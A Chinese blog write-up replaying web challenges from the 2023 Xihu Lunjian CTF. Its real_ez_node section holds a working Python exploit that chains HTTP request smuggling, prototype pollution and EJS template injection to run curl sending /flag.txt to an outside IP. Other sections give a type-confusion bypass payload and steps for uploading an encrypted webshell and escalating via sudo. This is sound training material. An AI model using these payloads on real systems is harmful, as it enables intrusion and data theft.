西湖论剑 2023 比赛复现

最新推荐文章于 2024-08-31 19:59:30 发布
最新推荐文章于 2024-08-31 19:59:30 发布
阅读量1.4k 收藏
点赞数 1
分类专栏: 比赛复现 文章标签: 比赛复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/128985484
版权

WEB

real_ez_node

route/index.js 中:

router.post('/copy',(req,res)=>{
  res.setHeader('Content-type','text/html;charset=utf-8')
  var ip = req.connection.remoteAddress;
  console.log(ip);
  var obj = {
      msg: '',
  }
  if (!ip.includes('127.0.0.1')) {
      obj.msg="only for admin"
      res.send(JSON.stringify(obj));
      return 
  }
  let user = {};
  for (let index in req.body) {
      if(!index.includes("__proto__")){
          safeobj.expand(user, index, req.body[index])
      }
    }
  res.render('index');
})

copy 路由会检验 ip 地址是否为 127.0.0.1,且请求体不能有 __proto__

router.get('/curl', function(req, res) {
    var q = req.query.q;
    var resp = "";
    if (q) {
		var url = 'http://localhost:3000/?q=' + q
            try {
                http.get(url,(res1)=>{
                    const { statusCode } = res1;
                    const contentType = res1.headers['content-type'];
                  
                    let error;
                    // 任何 2xx 状态码都表示成功响应,但这里只检查 200。
                    if (statusCode !== 200) {

在 curl 路由中我们可以用http 请求走私来访问 copy 从而可以绕过 copy 路由里面的 ip 检测,然后利用constructor.prototype 替代 __proto__,最后打ejs就行了。
payload:

import urllib.parse
import requests
payload = ''' HTTP/1.1

POST /copy HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Connection: close
Content-Length: 155

{"constructor.prototype.outputFunctionName":"x;global.process.mainModule.require('child_process').exec('curl 192.168.10.104:12345/`cat /flag.txt`');var x"}
'''.replace("\n", "\r\n")


def encode(data):
    tmp = u""
    for i in data:
        tmp += chr(0x0100 + ord(i))
    return tmp


payload = encode(payload)
print(payload)

r = requests.get('http://192.168.10.104:3000/curl?q=' + urllib.parse.quote(payload))
print(r.text)

Node Magical Login

flag1 可以利用 cookie 令 user=admin 获得。

function Flag1Controller(req,res){
    try {
        if(req.cookies.user === SECRET_COOKIE){
            res.setHeader("This_Is_The_Flag1",flag1.toString().trim())
            res.setHeader("This_Is_The_Flag2",flag2.toString().trim())
            res.status(200).type("text/html").send("Login success. Welcome,admin!")
        }
        if(req.cookies.user === "admin") {
            res.setHeader("This_Is_The_Flag1", flag1.toString().trim())
            res.status(200).type("text/html").send("You Got One Part Of Flag! Try To Get Another Part of Flag!")
        }else{
            res.status(401).type("text/html").send("Unauthorized")
        }
    }catch (__) {}
}

获得 flag2 的条件有两个,一个是 checkcode 的长度要是 16,另一个就是在转小写后要等于 aGr5AtSp55dRacer,但是这根本不可能,我们可以让它提前异常结束,也就是在 checkcode = checkcode.toLowerCase()处异常报错,那么我们可以令 checkcode 为一个数组,且长度为16。

function CheckController(req,res) {
    let checkcode = req.body.checkcode?req.body.checkcode:1234;
    console.log(req.body)
    if(checkcode.length === 16){
        try{
            checkcode = checkcode.toLowerCase()
            if(checkcode !== "aGr5AtSp55dRacer"){
                res.status(403).json({"msg":"Invalid Checkcode1:" + checkcode})
            }
        }catch (__) {}
        res.status(200).type("text/html").json({"msg":"You Got Another Part Of Flag: " + flag2.toString().trim()})
    }else{
        res.status(403).type("text/html").json({"msg":"Invalid Checkcode2:" + checkcode})
    }
}

payload:

{"checkcode":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]}

扭转乾坤

随便上传一个提示 content-Type 不行,我们只要令第一个 m 大写就可以了。
在这里插入图片描述

unusual php

没环境,就写一下流程吧。

通过 phpinfo 可以看到他使用了 ZendGuard 的加密工具。
可以通过 php.ini 来找到 ZendGuard 扩展的文件名,通过 phpinfo 找到扩展文件也就是 zend_test.so 的位置。(可以在extension_dir 中找到)。

之后通过脚本把扩展保存下来(也可以利用伪协议加密后,再解密,不容易漏字节),放到 ida 中找到 RC4 函数,里面有秘钥(abcsdfadfjiweur)。
使用秘钥加密一句话木马后上传文件,可以用 cyber 网站加密解密。

利用 sudo -l 查看可以执行的命令,利用 sudo chmod 777 /flag ,最后读取 flag。

docker

https://github.com/Randark-JMT/CTF_Archive/tree/main/2022%20xhlj

wp

http://www.hackdig.com/02/hack-904398.htm
succ3
关注
专栏目录
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 1882
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
ST-GCN论文简读以及复现
如果想成为中心,那么就到中心去吧。
10-14 3490
code: https://github.com/yysijie/st-gcn 文章目录普通卷积与图卷积普通卷积图卷积数据输入数据结构数据预处理图划分策略网络结构复现 普通卷积与图卷积 普通卷积 在理解图卷积之前,需要认识一下传统的卷积。对于一个3×3的卷积操作而言,相当于把3×3的卷积核在图像上滑动。每一次会有对应的9个数字相乘之后相加,然后得到一个最终的值。 在这里,换一个角度来看,图像上的每一个数字都是一个特征,而卷积的操作,是以一个像素点为中心,将其周围的8个点连同它自己的特征加权(卷积核的值)后.
西湖论剑——pwn
weixin_44319142的博客
04-07 586
pwn 这道题目开了canary,和之前的套路相似,就是要泄露canary,利用栈溢出找到system和/bin/sh,拿到访问权限 看一下函数 printf存在格式化字符串漏洞可以用于泄漏canary p.sendlineafter("ID:","%15$p") #不解释了这个要打印的是第十五个参数,也就是canary的值 p.recvuntil("Hello ")#输出hello之后...
2023西湖论剑RE--BabyRE
qq_61670993的博客
03-05 616
小菜鸡一枚
[西湖论剑 2022]Node Magical Login
最新发布
xiaole_shi的博客
08-31 1839
西湖论剑 2022]Node Magical Login1、get访问flag1,修改cookie为admin,发包,在文件头得到第一个flag2、访问flag2会发现渲染check.html,要求输入checkcode,然后post提交给/getflag2,类型是json类型在flag2检查函数里发现,checkcode的长度必须是16,且转为小写后与"aGr5AtSp55dRacer"相等,显然不可能,我们使checkcode.toLowerCase报错即可在/getflag2。
2023西湖论剑wirteup
Amherstieae的博客
02-08 2269
前言:总之每天就是很困,每天都睡不醒,冬天困,夏天也困,没有不困的时候好想睡觉,开始写西湖论剑的复盘,希望以后多多复盘,多多写文章吧~~~(还是好困顺便,给大家推荐 田震版本的 若思念便思念,好听!!!!!!!!!!!!!!顺便,腊梅好像开了,好香。
2023西湖论剑--messageboard
m0_61948538的博客
03-03 326
沙箱&栈迁移
2023西湖论剑-(部分)WP
xccwxy的博客
02-03 2406
2023西湖论剑-(部分)WP
26篇计量经济经典论文复现数据和Stata或R代码
05-01
26篇计量经济经典论文复现数据和Stata或R代码
CVE-2023-21839漏洞复现
qq_34914659的博客
02-28 4177
CVE-2023-21839漏洞复现
2023西湖论剑复现
Luodehahajiang的博客
02-12 409
导出HTTP流,发现一个flag压缩包(有密码),找到解密算法。连接adb shell到目录data/system删除相应文件。结果分离出一个压缩包,mp3解出的就是压缩包密码。MP3stego分析一下,没有密码。分析觉得把黑白做01分离出来有东西。根据文件名47,rot47解密。重启后发现很多压缩包和两张图片。binwalk分离出一张图片。npbk文件,导入夜神模拟器。run一下或者F12。打开后发现有pin码。
西湖论剑2023 Dual personality writeup ——天堂之门技术的分析
qq_41866334的博客
02-04 1295
天堂之门技术分析
WP-2021西湖论剑
ce666666的博客
01-16 1139
2021西湖论剑-wp 前言 全靠大佬打,我是划水的。 灏妹的web 页面开发中 Dirsearch扫一下,idea泄露 ezupload 查看页面源代码,发现提示 ?source=1 发现使用_FILE进行上传,构造上传表单 访问并随便上传一个文件,放到bp里回显no 查看源码最后一个else,在此情况进行渲染temper/index.latte,同时文件也被写入temper。也就是我们上传index.latte的文件。 waf测试 {if “${nl /f*>1}”}{/if} 然后上
参加西湖论剑2021
暮冬拾叁的博客
04-24 449
参加西湖论剑2021一组照片总结 一组照片 今天在美丽的人杭州参加了西湖论剑,直接上一组照片吧。 总结 杭州今天有雨,但人在论坛现场感觉不到,哈哈哈
西湖论剑——指鹿为马
qq_43615309的博客
10-13 994
前几天被hxd拉去看看题,其中MISC的指鹿为马很有意思,我来说说这题我的解法。 首先nc服务器down下了三个信息,首先是python的源代码 import numpy as np from PIL import Image import math import operator import os import time import base64 import random def load_horse(): data = [] p = Image.open('./horse.pn
西湖论剑2022-misc-wp
网安小菜鸡
02-03 417
misc
西湖论剑逆向
qq_41071646的博客
04-09 572
其实可以石锤我是标题党了 哈哈哈 其实这个我也很尴尬 ·~ 没有题目 没办法好好的去做一下题 但是听说安恒会有复现 复现的时候能够好好做也是极好的 然后 先说一下这个题 题目 其实是在https://www.52pojie.cn/thread-924174-1-1.html这个链接下载的 多谢师傅的分享 其实 testre 这个题 很简单的一个题 就是 怎...
2021 西湖论剑 pwn blind
yongbaoii的博客
03-26 629
利用ret2csu,覆盖alarm的got表最低一字节,通过爆破劫持alarm为syscall。 通过read函数的返回值让rax为0x5b,执行execve("/bin/sh", 0, 0) exp #/usr/env/bin python from pwn import * import time context.log_level = "debug" gadget1 = 0x4007ba gadget2 = 0x4007a0 elf = ELF('./blind') read_got = el.
CVE-2023-32315 Openfire 漏洞绕过技术复现
该文件"CVE-2023-32315-Openfire-Bypass-main.zip"很可能包含了用于复现CVE-2023-32315漏洞的代码或工具。复现漏洞是指在安全测试过程中,通过特定的步骤或代码执行,重现该漏洞的整个过程。这是一个重要的步骤,它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值